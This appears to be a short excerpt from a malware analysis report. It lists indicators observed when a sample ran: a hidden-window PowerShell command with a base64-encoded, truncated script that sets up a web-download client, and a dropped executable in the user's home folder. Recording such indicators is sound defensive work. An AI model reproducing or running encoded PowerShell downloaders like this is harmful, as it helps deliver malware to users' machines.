Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3ADkAXwA4ADQAXwBfAD0AKAAnAHUAXwAnACsAJwA2ADEAMQAnACsAJwAzADYANwAnACkAOwAkAGsANwBfAF8AOQBfADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYgA4ADcANgA0AF8APQAoAC...
- %HOMEPATH%\284.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3ADkAXwA4ADQAXwBfAD0AKAAnAHUAXwAnACsAJwA2ADEAMQAnACsAJwAzADYANwAnACkAOwAkAGsANwBfAF8AOQBfADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYgA4ADcANgA0AF8APQAoAC...' (with hidden window)